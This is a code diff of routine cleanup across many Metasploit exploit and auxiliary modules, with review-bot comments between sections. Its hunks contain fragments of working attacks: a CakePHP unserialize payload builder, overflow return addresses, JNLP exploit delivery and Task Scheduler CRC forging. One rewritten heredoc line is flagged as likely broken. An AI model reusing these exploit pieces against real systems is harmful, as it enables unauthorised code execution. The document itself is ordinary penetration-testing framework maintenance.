http_totalBGIRequests = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.21.0')
|
http_totalBGIRequests = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.21.0')
|
||||||
if http_totalBGIRequests.to_s !~ /Null/
|
if http_totalBGIRequests.to_s !~ /Null/
|
||||||
iis.push([["BGIRequests : "],[http_totalBGIRequests]])
|
iis.push([["BGIRequests : "],[http_totalBGIRequests]])
|
||||||
end
|
end
|
||||||
|
|
||||||
http_totalNotFoundErrors = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.22.0')
|
http_totalNotFoundErrors = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.22.0')
|
||||||
if http_totalNotFoundErrors.to_s !~ /Null/
|
if http_totalNotFoundErrors.to_s !~ /Null/
|
||||||
iis.push([["NotFoundErrors : "],[http_totalNotFoundErrors]])
|
iis.push([["NotFoundErrors : "],[http_totalNotFoundErrors]])
|
||||||
end
|
end
|
||||||
|
|
||||||
if not iis.empty?
|
if not iis.empty?
|
||||||
print_line('')
|
print_line('')
|
||||||
print_status("IIS server information")
|
print_status("IIS server information")
|
||||||
print_line('')
|
print_line('')
|
||||||
iis.each {|a,b| print_line("#{a} #{b}")}
|
iis.each {|a,b| print_line("#{a} #{b}")}
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
|
|
||||||
storage_information = []
|
storage_information = []
|
||||||
|
|
||||||
snmp.walk(["1.3.6.1.2.1.25.2.3.1.1","1.3.6.1.2.1.25.2.3.1.2","1.3.6.1.2.1.25.2.3.1.3","1.3.6.1.2.1.25.2.3.1.4","1.3.6.1.2.1.25.2.3.1.5","1.3.6.1.2.1.25.2.3.1.6"]) do |index,type,descr,allocation,size,used|
|
snmp.walk(["1.3.6.1.2.1.25.2.3.1.1","1.3.6.1.2.1.25.2.3.1.2","1.3.6.1.2.1.25.2.3.1.3","1.3.6.1.2.1.25.2.3.1.4","1.3.6.1.2.1.25.2.3.1.5","1.3.6.1.2.1.25.2.3.1.6"]) do |index,type,descr,allocation,size,used|
|
||||||
|
@ -670,16 +670,16 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
storage_information.push([[descr.value],[index.value],[type.value],[allocation.value],[size.value],[used.value]])
|
storage_information.push([[descr.value],[index.value],[type.value],[allocation.value],[size.value],[used.value]])
|
||||||
end
|
end
|
||||||
|
|
||||||
if not storage_information.empty?
|
if not storage_information.empty?
|
||||||
print_line('')
|
print_line('')
|
||||||
print_status("Storage information")
|
print_status("Storage information")
|
||||||
print_line('')
|
print_line('')
|
||||||
storage_information.each {|a,b,c,d,e,f|
|
storage_information.each {|a,b,c,d,e,f|
|
||||||
|
|
||||||
e = number_to_human_size(e,d)
|
e = number_to_human_size(e,d)
|
||||||
f = number_to_human_size(f,d)
|
f = number_to_human_size(f,d)
|
||||||
|
|
||||||
print_line("#{a}")
|
print_line("#{a}")
|
||||||
print_line("\tDevice id : #{b}")
|
print_line("\tDevice id : #{b}")
|
||||||
print_line("\tFilesystem type : #{c}")
|
print_line("\tFilesystem type : #{c}")
|
||||||
|
@ -689,23 +689,23 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
print_line('')
|
print_line('')
|
||||||
}
|
}
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
|
|
||||||
file_system = []
|
file_system = []
|
||||||
|
|
||||||
hrFSIndex = snmp.get_value('1.3.6.1.2.1.25.3.8.1.1.1')
|
hrFSIndex = snmp.get_value('1.3.6.1.2.1.25.3.8.1.1.1')
|
||||||
if hrFSIndex.to_s !~ /Null/
|
if hrFSIndex.to_s !~ /Null/
|
||||||
file_system.push([["Index : "],[hrFSIndex]])
|
file_system.push([["Index : "],[hrFSIndex]])
|
||||||
end
|
end
|
||||||
|
|
||||||
hrFSMountPoint = snmp.get_value('1.3.6.1.2.1.25.3.8.1.2.1')
|
hrFSMountPoint = snmp.get_value('1.3.6.1.2.1.25.3.8.1.2.1')
|
||||||
if hrFSMountPoint.to_s !~ /Null/
|
if hrFSMountPoint.to_s !~ /Null/
|
||||||
file_system.push([["Mount point : "],[hrFSMountPoint]])
|
file_system.push([["Mount point : "],[hrFSMountPoint]])
|
||||||
end
|
end
|
||||||
|
|
||||||
hrFSRemoteMountPoint = snmp.get_value('1.3.6.1.2.1.25.3.8.1.3.1')
|
hrFSRemoteMountPoint = snmp.get_value('1.3.6.1.2.1.25.3.8.1.3.1')
|
||||||
if hrFSRemoteMountPoint.to_s !~ /Null/
|
if hrFSRemoteMountPoint.to_s !~ /Null/
|
||||||
if hrFSRemoteMountPoint.empty?
|
if hrFSRemoteMountPoint.empty?
|
||||||
|
@ -713,7 +713,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
file_system.push([["Remote mount point : "],[hrFSRemoteMountPoint]])
|
file_system.push([["Remote mount point : "],[hrFSRemoteMountPoint]])
|
||||||
end
|
end
|
||||||
|
|
||||||
hrFSType = snmp.get_value('1.3.6.1.2.1.25.3.8.1.4.1')
|
hrFSType = snmp.get_value('1.3.6.1.2.1.25.3.8.1.4.1')
|
||||||
|
|
||||||
case hrFSType.to_s
|
case hrFSType.to_s
|
||||||
|
@ -766,7 +766,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
else
|
else
|
||||||
hrFSType = "Null"
|
hrFSType = "Null"
|
||||||
end
|
end
|
||||||
|
|
||||||
if hrFSType.to_s !~ /Null/
|
if hrFSType.to_s !~ /Null/
|
||||||
file_system.push([["Type : "],[hrFSType]])
|
file_system.push([["Type : "],[hrFSType]])
|
||||||
end
|
end
|
||||||
|
@ -775,12 +775,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
if hrFSAccess.to_s !~ /Null/
|
if hrFSAccess.to_s !~ /Null/
|
||||||
file_system.push([["Access : "],[hrFSAccess]])
|
file_system.push([["Access : "],[hrFSAccess]])
|
||||||
end
|
end
|
||||||
|
|
||||||
hrFSBootable = snmp.get_value('1.3.6.1.2.1.25.3.8.1.6.1')
|
hrFSBootable = snmp.get_value('1.3.6.1.2.1.25.3.8.1.6.1')
|
||||||
if hrFSBootable.to_s !~ /Null/
|
if hrFSBootable.to_s !~ /Null/
|
||||||
file_system.push([["Bootable : "],[hrFSBootable]])
|
file_system.push([["Bootable : "],[hrFSBootable]])
|
||||||
end
|
end
|
||||||
|
|
||||||
if not file_system.empty?
|
if not file_system.empty?
|
||||||
print_line('')
|
print_line('')
|
||||||
print_status("File system information")
|
print_status("File system information")
|
||||||
|
@ -795,7 +795,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
device_information = []
|
device_information = []
|
||||||
|
|
||||||
snmp.walk(["1.3.6.1.2.1.25.3.2.1.1","1.3.6.1.2.1.25.3.2.1.2","1.3.6.1.2.1.25.3.2.1.5","1.3.6.1.2.1.25.3.2.1.3"]) do |index,type,status,descr|
|
snmp.walk(["1.3.6.1.2.1.25.3.2.1.1","1.3.6.1.2.1.25.3.2.1.2","1.3.6.1.2.1.25.3.2.1.5","1.3.6.1.2.1.25.3.2.1.3"]) do |index,type,status,descr|
|
||||||
|
|
||||||
case type.value.to_s
|
case type.value.to_s
|
||||||
when /^1.3.6.1.2.1.25.3.1.1$/
|
when /^1.3.6.1.2.1.25.3.1.1$/
|
||||||
type.value = "Other"
|
type.value = "Other"
|
||||||
|
@ -836,7 +836,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
else
|
else
|
||||||
type.value = "unknown"
|
type.value = "unknown"
|
||||||
end
|
end
|
||||||
|
|
||||||
case status.value
|
case status.value
|
||||||
when 1
|
when 1
|
||||||
status.value = "unknown"
|
status.value = "unknown"
|
||||||
|
@ -856,8 +856,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
device_information.push([[index.value],[type.value],[status.value],[descr.value]])
|
device_information.push([[index.value],[type.value],[status.value],[descr.value]])
|
||||||
end
|
end
|
||||||
|
|
||||||
if not device_information.empty?
|
if not device_information.empty?
|
||||||
print_line('')
|
print_line('')
|
||||||
print_status("Device information")
|
print_status("Device information")
|
||||||
print_line('')
|
print_line('')
|
||||||
|
@ -876,7 +876,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
software_list.push([[index.value],[name.value]])
|
software_list.push([[index.value],[name.value]])
|
||||||
end
|
end
|
||||||
|
|
||||||
if not software_list.empty?
|
if not software_list.empty?
|
||||||
print_line('')
|
print_line('')
|
||||||
print_status("Software components")
|
print_status("Software components")
|
||||||
print_line('')
|
print_line('')
|
||||||
|
@ -900,11 +900,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
else
|
else
|
||||||
status.value = "unknown"
|
status.value = "unknown"
|
||||||
end
|
end
|
||||||
|
|
||||||
process_interfaces.push([[id.value],[status.value],[name.value],[path.value],[param.value]])
|
process_interfaces.push([[id.value],[status.value],[name.value],[path.value],[param.value]])
|
||||||
end
|
end
|
||||||
|
|
||||||
if not process_interfaces.empty?
|
if not process_interfaces.empty?
|
||||||
print_line('')
|
print_line('')
|
||||||
print_status("Process interfaces")
|
print_status("Process interfaces")
|
||||||
print_line('')
|
print_line('')
|
||||||
|
@ -912,7 +912,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
print_line('')
|
print_line('')
|
||||||
process_interfaces.each {|a,b,c,d,e| print_line(sprintf("%10s %10s %22s %30s %s",a,b,c,d,e))}
|
process_interfaces.each {|a,b,c,d,e| print_line(sprintf("%10s %10s %22s %30s %s",a,b,c,d,e))}
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
|
@ -935,7 +935,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
|
|
||||||
def number_to_human_size(size,unit)
|
def number_to_human_size(size,unit)
|
||||||
size = size.first.to_i * unit.first.to_i
|
size = size.first.to_i * unit.first.to_i
|
||||||
|
|
||||||
if size < 1024
|
if size < 1024
|
||||||
"#{size} bytes"
|
"#{size} bytes"
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id: $
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => 'SNMP Set Module',
|
'Name' => 'SNMP Set Module',
|
||||||
'Version' => '$Revision: $',
|
'Version' => '$Revision$',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module, similar to snmpset tool, uses the SNMP SET request
|
This module, similar to snmpset tool, uses the SNMP SET request
|
||||||
to set information on a network entity. A OID (numeric notation)
|
to set information on a network entity. A OID (numeric notation)
|
||||||
|
|
|
@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
print_error
|
print_error
|
||||||
|
|
||||||
@use_static = true
|
@use_static = true
|
||||||
else
|
else
|
||||||
cp = "#{datastore["JavaCache"]}:" + File.join(Msf::Config.data_directory, "java")
|
cp = "#{datastore["JavaCache"]}:" + File.join(Msf::Config.data_directory, "java")
|
||||||
compile( [ "#{datastore["APPLETNAME"]}" ] , [ applet_code ], [ "-classpath", "#{cp}" ])
|
compile( [ "#{datastore["APPLETNAME"]}" ] , [ applet_code ], [ "-classpath", "#{cp}" ])
|
||||||
applet_file = File.join(datastore["JavaCache"], "#{datastore["APPLETNAME"]}.class")
|
applet_file = File.join(datastore["JavaCache"], "#{datastore["APPLETNAME"]}.class")
|
||||||
|
@ -241,20 +241,20 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def applet_code
|
def applet_code
|
||||||
applet = %Q|
|
applet = <<-EOS
|
||||||
import java.applet.*;
|
import java.applet.*;
|
||||||
import metasploit.*;
|
import metasploit.*;
|
||||||
|
|
||||||
public class #{datastore["APPLETNAME"]} extends Applet {
|
public class #{datastore["APPLETNAME"]} extends Applet {
|
||||||
public void init() {
|
public void init() {
|
||||||
try {
|
try {
|
||||||
Payload.main(null);
|
Payload.main(null);
|
||||||
} catch (Exception ex) {
|
} catch (Exception ex) {
|
||||||
//ex.printStackTrace();
|
//ex.printStackTrace();
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
EOS
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -22,12 +22,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
CakePHP is a popular PHP framework for building web applications.
|
CakePHP is a popular PHP framework for building web applications.
|
||||||
The Security component of CakePHP is vulnerable to an unserialize attack which
|
The Security component of CakePHP is vulnerable to an unserialize attack which
|
||||||
could be abused to allow unauthenticated attackers to execute arbitrary
|
could be abused to allow unauthenticated attackers to execute arbitrary
|
||||||
code with the permissions of the webserver.
|
code with the permissions of the webserver.
|
||||||
},
|
},
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
'tdz',
|
'tdz',
|
||||||
'Felix Wilhelm', # poc
|
'Felix Wilhelm', # poc
|
||||||
],
|
],
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
|
@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
p << 's:3:"Foo";s:'
|
p << 's:3:"Foo";s:'
|
||||||
p << len.to_s()
|
p << len.to_s()
|
||||||
p << ':"<? '
|
p << ':"<? '
|
||||||
p << payload.encoded
|
p << payload.encoded
|
||||||
p << ' ?>";}s:7:"__paths";a:0:{}s:9:"__objects";a:0:{}}'
|
p << ' ?>";}s:7:"__paths";a:0:{}s:9:"__objects";a:0:{}}'
|
||||||
|
|
||||||
#rot13 and urlencode
|
#rot13 and urlencode
|
||||||
|
@ -107,13 +107,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
{
|
{
|
||||||
'uri' => datastore['URI'],
|
'uri' => datastore['URI'],
|
||||||
'method' => "POST",
|
'method' => "POST",
|
||||||
'ctype' => 'application/x-www-form-urlencoded',
|
'ctype' => 'application/x-www-form-urlencoded',
|
||||||
'data' => data
|
'data' => data
|
||||||
}, 5)
|
}, 5)
|
||||||
|
|
||||||
print_status("Sending exploit request 2")
|
print_status("Sending exploit request 2")
|
||||||
res = send_request_cgi(
|
res = send_request_cgi(
|
||||||
{
|
{
|
||||||
'uri' => datastore['URI'],
|
'uri' => datastore['URI'],
|
||||||
'method' => "POST",
|
'method' => "POST",
|
||||||
'ctype' => 'application/x-www-form-urlencoded',
|
'ctype' => 'application/x-www-form-urlencoded',
|
||||||
|
|
|
@ -21,17 +21,17 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'Name' => 'Mitel Audio and Web Conferencing Command Injection',
|
'Name' => 'Mitel Audio and Web Conferencing Command Injection',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits a command injection flaw within the Mitel
|
This module exploits a command injection flaw within the Mitel
|
||||||
Audio and Web Conferencing web interface.
|
Audio and Web Conferencing web interface.
|
||||||
},
|
},
|
||||||
'Author' => [ 'hdm' ],
|
'Author' => [ 'hdm' ],
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Version' => '$Revision$',
|
'Version' => '$Revision$',
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
|
|
||||||
['URL', 'http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-14'],
|
['URL', 'http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-14'],
|
||||||
['OSVDB', '69934'],
|
['OSVDB', '69934'],
|
||||||
# ['CVE', ''],
|
# ['CVE', ''],
|
||||||
# ['BID', '']
|
# ['BID', '']
|
||||||
],
|
],
|
||||||
'Platform' => ['unix', 'linux'],
|
'Platform' => ['unix', 'linux'],
|
||||||
|
@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
print_status("Attempting to execute our command..")
|
print_status("Attempting to execute our command..")
|
||||||
|
|
||||||
res = send_request_cgi(
|
res = send_request_cgi(
|
||||||
{
|
{
|
||||||
'uri' => datastore['URIPATH'],
|
'uri' => datastore['URIPATH'],
|
||||||
|
@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
print_error("Unexpected reply: #{res.code} #{res.body[0,500].inspect}...")
|
print_error("Unexpected reply: #{res.code} #{res.body[0,500].inspect}...")
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
handler
|
handler
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id: $
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -28,6 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
},
|
},
|
||||||
'Author' => ['chao-mu'],
|
'Author' => ['chao-mu'],
|
||||||
'License' => BSD_LICENSE,
|
'License' => BSD_LICENSE,
|
||||||
|
'Version' => '$Revision$',
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
['OSVDB' => '50421'],
|
['OSVDB' => '50421'],
|
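Review bot: The context line `['OSVDB' => '50421'],` builds a one-element array holding a hash, not the two-element type/value pair that the other modules on this page use (`['OSVDB', '69934']`, `[ 'CVE', '2010-3563' ]`). The entry is therefore likely not recognised as an OSVDB reference, although how the framework reads this array is not visible here. Since this hunk already touches the metadata block, the line should read `['OSVDB', '50421'],`. The References array continues past the end of the hunk.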
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id: java_basicservice_impl.rb 10488 2010-09-26 23:55:03Z egypt $
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'Matthias Kaiser', # Discovery, PoC, metasploit module
|
'Matthias Kaiser', # Discovery, PoC, metasploit module
|
||||||
'egypt' # metasploit module
|
'egypt' # metasploit module
|
||||||
],
|
],
|
||||||
'Version' => '$Revision: 10488 $',
|
'Version' => '$Revision$',
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
[ 'CVE', '2010-3563' ],
|
[ 'CVE', '2010-3563' ],
|
||||||
|
@ -87,24 +87,26 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
send_response(cli, all, { 'Content-Type' => 'application/octet-stream' })
|
send_response(cli, all, { 'Content-Type' => 'application/octet-stream' })
|
||||||
|
|
||||||
when /init.jnlp/
|
when /init.jnlp/
|
||||||
init = %Q|<?xml version="1.0" encoding="UTF-8"?>
|
init = <<-EOS
|
||||||
|
<?xml version="1.0" encoding="UTF-8"?>
|
||||||
<jnlp href="#{jpath}/init.jnlp" version="1">
|
<jnlp href="#{jpath}/init.jnlp" version="1">
|
||||||
#{jnlp_info}
|
#{jnlp_info}
|
||||||
<application-desc main-class="BasicServiceExploit">
|
<application-desc main-class="BasicServiceExploit">
|
||||||
<argument>#{jpath}</argument>
|
<argument>#{jpath}</argument>
|
||||||
</application-desc>
|
</application-desc>
|
||||||
</jnlp>
|
</jnlp>
|
||||||
|
|
EOS
|
||||||
print_status("Sending init.jnlp")
|
print_status("Sending init.jnlp")
|
||||||
send_response(cli, init, { 'Content-Type' => 'application/x-java-jnlp-file' })
|
send_response(cli, init, { 'Content-Type' => 'application/x-java-jnlp-file' })
|
||||||
|
|
||||||
when /exploit.jnlp/
|
when /exploit.jnlp/
|
||||||
expl = %Q|<?xml version="1.0" encoding="UTF-8"?>
|
expl = <<-EOS
|
||||||
<jnlp href="#{jpath}/exploit.jnlp" version="1">
|
<?xml version="1.0" encoding="UTF-8"?>
|
||||||
#{jnlp_info}
|
<jnlp href="#{jpath}/exploit.jnlp" version="1">
|
||||||
<application-desc main-class="Exploit"/>
|
#{jnlp_info}
|
||||||
</jnlp>
|
<application-desc main-class="Exploit"/>
|
||||||
|
|
</jnlp>
|
||||||
|
EOS
|
||||||
print_status("Sending exploit.jnlp")
|
print_status("Sending exploit.jnlp")
|
||||||
send_response(cli, expl, { 'Content-Type' => 'application/x-java-jnlp-file' })
|
send_response(cli, expl, { 'Content-Type' => 'application/x-java-jnlp-file' })
|
||||||
|
|
||||||
|
@ -129,15 +131,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def jnlp_info
|
def jnlp_info
|
||||||
%Q|<information>
|
buf <<-EOS
|
||||||
<title>#{Rex::Text.rand_text_alpha(rand(10)+10)}</title>
|
<information>
|
||||||
<vendor>#{Rex::Text.rand_text_alpha(rand(10)+10)}</vendor>
|
<title>#{Rex::Text.rand_text_alpha(rand(10)+10)}</title>
|
||||||
<description>#{Rex::Text.rand_text_alpha(rand(10)+10)}</description>
|
<vendor>#{Rex::Text.rand_text_alpha(rand(10)+10)}</vendor>
|
||||||
</information>
|
<description>#{Rex::Text.rand_text_alpha(rand(10)+10)}</description>
|
||||||
<resources>
|
</information>
|
||||||
<java version="1.6+"/>
|
<resources>
|
||||||
<jar href="#{get_uri}/exploit.jar"/>
|
<java version="1.6+"/>
|
||||||
</resources>
|
<jar href="#{get_uri}/exploit.jar"/>
|
||||||
|
|
</resources>
|
||||||
|
EOS
|
||||||
end
|
end
|
||||||
end
|
end
|
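Review bot: In the last hunk of this file, the rewritten `jnlp_info` opens with `buf <<-EOS`, which has no `=`. No local `buf` exists at that point in the visible lines, so Ruby will most likely parse this as a call to a method named `buf` with the heredoc as its argument and raise NoMethodError the first time `jnlp_info` is interpolated. The old `%Q|...|` form simply returned the string, and the other two conversions in this file (`init = <<-EOS`, `expl = <<-EOS`) do assign. The line should read `buf = <<-EOS`, or a bare `<<-EOS` as the method's only expression, so that the method still returns the text.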
||||||
|
|
|
@ -38,9 +38,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
.NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not
|
.NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not
|
||||||
opt-in to ASLR. As such, this module should be reliable on all Windows
|
opt-in to ASLR. As such, this module should be reliable on all Windows
|
||||||
versions.
|
versions.
|
||||||
|
|
||||||
The WMI Adminsitrative Tools are a standalone download & install (linked in the
|
The WMI Adminsitrative Tools are a standalone download & install (linked in the
|
||||||
references).
|
references).
|
||||||
|
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
|
|
|
@ -55,6 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
[ 'Windows XP SP2 - English', { 'Ret' => 0x02291457} ], # 0x02291457 pop, pop, ret dsp_mjMain.dll
|
[ 'Windows XP SP2 - English', { 'Ret' => 0x02291457} ], # 0x02291457 pop, pop, ret dsp_mjMain.dll
|
||||||
],
|
],
|
||||||
'Privileged' => false,
|
'Privileged' => false,
|
||||||
|
'DisclosureDate' => 'July 1 2009',
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0))
|
||||||
|
|
||||||
register_options(
|
register_options(
|
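Review bot: The added `'DisclosureDate' => 'July 1 2009',` spells the month out and leaves the day unpadded. The two other dates this commit adds in later file sections use an abbreviated month (`'Dec 25 2009'`, `'Oct 08 2010'`). Using one format, e.g. `'DisclosureDate' => 'Jul 01 2009',`, keeps the field consistent for anything that sorts or parses module metadata, although how the framework parses this string is not visible here. The `update_info` call that holds these keys starts before the hunk.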
||||||
|
|
|
@ -55,6 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
[ 'Windows XP SP2 - English', { 'Ret' => 0x7c941eed} ], # 0x7c941eed JMP ESP - SHELL32.dll
|
[ 'Windows XP SP2 - English', { 'Ret' => 0x7c941eed} ], # 0x7c941eed JMP ESP - SHELL32.dll
|
||||||
],
|
],
|
||||||
'Privileged' => false,
|
'Privileged' => false,
|
||||||
|
'DisclosureDate' => 'Dec 25 2009',
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0))
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
|
|
|
@ -23,12 +23,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits a stack-based buffer overflow in the handling of the
|
This module exploits a stack-based buffer overflow in the handling of the
|
||||||
'pFragments' shape property within the Microsoft Word RTF parser. All versions
|
'pFragments' shape property within the Microsoft Word RTF parser. All versions
|
||||||
of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the
|
of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the
|
||||||
MS10-087 bulletin are vulnerable.
|
MS10-087 bulletin are vulnerable.
|
||||||
|
|
||||||
This module does not attempt to exploit the vulnerability via Microsoft Outlook.
|
This module does not attempt to exploit the vulnerability via Microsoft Outlook.
|
||||||
|
|
||||||
The Microsoft Word RTF parser was only used by default in versions of Microsoft
|
The Microsoft Word RTF parser was only used by default in versions of Microsoft
|
||||||
Word itself prior to Office 2007. With the release of Office 2007, Microsoft
|
Word itself prior to Office 2007. With the release of Office 2007, Microsoft
|
||||||
began using the Word RTF parser, by default, to handle rich-text messages within
|
began using the Word RTF parser, by default, to handle rich-text messages within
|
||||||
Outlook as well. It was possible to configure Outlook 2003 and earlier to use
|
Outlook as well. It was possible to configure Outlook 2003 and earlier to use
|
||||||
|
@ -154,7 +154,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
# Stick fake SEH frames here and there ;)
|
# Stick fake SEH frames here and there ;)
|
||||||
if target.name == "Automatic"
|
if target.name == "Automatic"
|
||||||
targets.each { |t|
|
targets.each { |t|
|
||||||
next if t.name !~ /Windows/i
|
next if t.name !~ /Windows/i
|
||||||
|
|
||||||
add_target(rest, t)
|
add_target(rest, t)
|
||||||
}
|
}
|
||||||
|
@ -178,7 +178,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
content << "}"
|
content << "}"
|
||||||
|
|
||||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||||
file_create(content)
|
file_create(content)
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -165,7 +165,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
if target.name == "Automatic"
|
if target.name == "Automatic"
|
||||||
targets.each { |t|
|
targets.each { |t|
|
||||||
next if t.name !~ /Windows/i
|
next if t.name !~ /Windows/i
|
||||||
|
|
||||||
add_target(data, t)
|
add_target(data, t)
|
||||||
}
|
}
|
||||||
|
|
|
@ -47,6 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
[
|
[
|
||||||
[ 'Nuance PDF Reader v6.x (XP SP3)', { 'Ret' => 0x10191579, 'Offset' => 1290 } ] #ppr - pluscore.dll
|
[ 'Nuance PDF Reader v6.x (XP SP3)', { 'Ret' => 0x10191579, 'Offset' => 1290 } ] #ppr - pluscore.dll
|
||||||
],
|
],
|
||||||
|
'DisclosureDate' => 'Oct 08 2010',
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0))
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
|
|
|
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Post
|
||||||
def initialize(info={})
|
def initialize(info={})
|
||||||
super( update_info( info,
|
super( update_info( info,
|
||||||
'Name' => 'Schelevator',
|
'Name' => 'Schelevator',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.
|
This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.
|
||||||
NOTE: Thanks to webDEViL for the information about disable/enable.
|
NOTE: Thanks to webDEViL for the information about disable/enable.
|
||||||
},
|
},
|
||||||
|
@ -324,7 +324,7 @@ class Metasploit3 < Msf::Post
|
||||||
|
|
||||||
crc = crc32(data[0, data.length - 12])
|
crc = crc32(data[0, data.length - 12])
|
||||||
data[-12, 4] = [crc].pack('V')
|
data[-12, 4] = [crc].pack('V')
|
||||||
|
|
||||||
data[-12, 12].unpack('C*').reverse.each { |b|
|
data[-12, 12].unpack('C*').reverse.each { |b|
|
||||||
old_crc = ((old_crc << 8) ^ bwd_table[old_crc >> 24] ^ b) & 0xffffffff
|
old_crc = ((old_crc << 8) ^ bwd_table[old_crc >> 24] ^ b) & 0xffffffff
|
||||||
}
|
}
|
||||||
|
|